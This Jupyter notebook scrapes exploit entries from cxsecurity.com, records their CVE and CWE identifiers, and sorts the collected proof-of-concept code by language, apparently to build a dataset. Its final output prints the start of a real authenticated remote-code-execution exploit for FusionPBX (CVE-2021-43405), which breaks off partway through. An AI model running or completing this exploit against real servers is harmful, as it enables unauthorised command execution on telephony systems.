In [ ]:
dictella = {}

In [1]:
import torch
dictella = torch.load('cxsecurity_scraper.pt')
visited = torch.load('cxsecurity_visited.pt')

In [ ]:
s.cookies.clear()


In [ ]:
from bs4 import BeautifulSoup
import requests
from tqdm import tqdm
s = requests.Session()
main_url = 'https://cxsecurity.com/exploit/'
header = {
    "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" ,
    'referer':'https://www.google.com/'
}

for i in tqdm(range(80)):
    if main_url + str(i) in visited:
        continue
    r = s.get(main_url + str(i),headers=header)
    visited.append(main_url + str(i))
    main_soup = BeautifulSoup(r.text, 'html.parser')
    #print(main_soup.prettify())
    if 'Captcha. You know what to do.' in main_soup.prettify():
        tqdm.write('Captcha')
        raise KeyboardInterrupt
    rows = main_soup.find_all('tr')
    for row in rows:
        anchors = row.find_all('a')
        for anchor in anchors:
            url = anchor.get('href')
            if 'WLB-' in url:
                if url in dictella.keys():
                    continue
                #tqdm.write(url)
                r = s.get(url,headers=header)
                soup = BeautifulSoup(r.text, 'html.parser')
                if 'Captcha. You know what to do.' in soup.prettify():
                    tqdm.write('Captcha')
                    raise KeyboardInterrupt
                bs = soup.find_all('b')
                cve = 'N/A'
                cwe = 'N/A'
                exploit = 'N/A'
                for b in bs:
                    if 'CVE' in b.text:
                        cve = b.text
                    if 'CWE' in b.text:
                        cwe = b.text
                divs = soup.findAll('div',class_='well')
                for div in divs:
                    if 'exploit' in div.text.lower():
                        exploit = div.text
                if cve == 'N/A' and cwe == 'N/A' and exploit == 'N/A':
                    continue
                elif exploit == 'N/A':
                    continue
                dictella[url] = [cve,cwe,exploit]
                #print(cve,cwe,exploit)





In [ ]:
import torch
torch.save(dictella, 'cxsecurity_scraper.pt')
torch.save(visited, 'cxsecurity_visited.pt')

In [ ]:
'https://cxsecurity.com/issue/WLB-2021110030'.split('/')[-1]

In [ ]:
for key in dictella.keys():
    if '/python' in dictella[key][2].lower():
        cvecwe = dictella[key][0] + '_' + dictella[key][1] + '_'
        filename = 'py/' + cvecwe.replace('N/A','NA') + key.split('/')[-1] + '.py'
        filename = filename.replace(' ','')
        if 'NA_NA' in filename:
            continue
        try:
            with open(filename,'w') as f:
                f.write(dictella[key][2])
            print(key,filename)
            print('\n')
        except:
            pass

In [9]:
list(dictella.keys())[0]

'https://cxsecurity.com/issue/WLB-2021110030'

In [19]:
from guesslang import Guess
guesser = Guess()
poc_type_number = {}
for key in dictella.keys():
    lang = guesser.language_name(dictella[key][2])
    cvecwe = dictella[key][0] + '_' + dictella[key][1] + '_'
    filename = cvecwe.replace('N/A','NA') + key.split('/')[-1]
    filename = filename.replace(' ','')

    if lang in poc_type_number.keys():
        poc_type_number[lang].append((filename,dictella[key][2]))
    else:
        poc_type_number[lang] = [(filename,dictella[key][2])]


In [14]:
poc_type_number.keys()

dict_keys(['Python', 'Ruby', 'Go', 'Shell', 'Makefile', 'INI', 'Markdown', 'YAML', 'Groovy', 'Assembly', 'Perl', 'JavaScript', 'C++', 'CoffeeScript', 'Julia', 'PHP', 'Verilog', 'Batchfile', 'PowerShell', 'XML', 'R', 'Lua', 'Dockerfile', 'Prolog', 'C', 'HTML', 'Elixir', 'TypeScript', 'COBOL', 'Java', 'CSV', 'Haskell', 'Visual Basic', 'C#', 'CSS', 'SQL', 'Fortran', 'Clojure', 'Swift', 'Rust', 'DM'])

In [20]:
poc_type_number['Python']

[('CVE-2021-43405_NA_WLB-2021110030',
  "# Exploit Title: FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)\r\n# Date: 11/08/2021\r\n# Exploit Author: Luska\r\n# Vendor Homepage: https://www.fusionpbx.com/\r\n# Software Link: https://github.com/fusionpbx/fusionpbx\r\n# Version: < 4.5.30\r\n# Tested on: Debian\r\n# CVE : CVE-2021-43405\r\n\r\n#!/usr/bin/python3\r\nimport requests\r\nfrom requests_toolbelt.multipart.encoder import MultipartEncoder\r\nimport argparse\r\n\r\n\r\ncookies = {'PHPSESSID': '31337'}\r\nproxy = {'http': 'http://127.0.0.1:8080'}\r\n\r\ndef login(url, username, password):\r\n    data = {\r\n        'username': username,\r\n        'password': password\r\n    }\r\n    r = requests.post(url + '/core/user_settings/user_dashboard.php', data=data, cookies=cookies)\r\n    return r.status_code\r\n\r\ndef exploit_request(url, cmd):\r\n    print('[+] Sending Exploit Request')\r\n    mp_encoder = MultipartEncoder(fields={ 'fax_subject': '1337', 'fax_extension':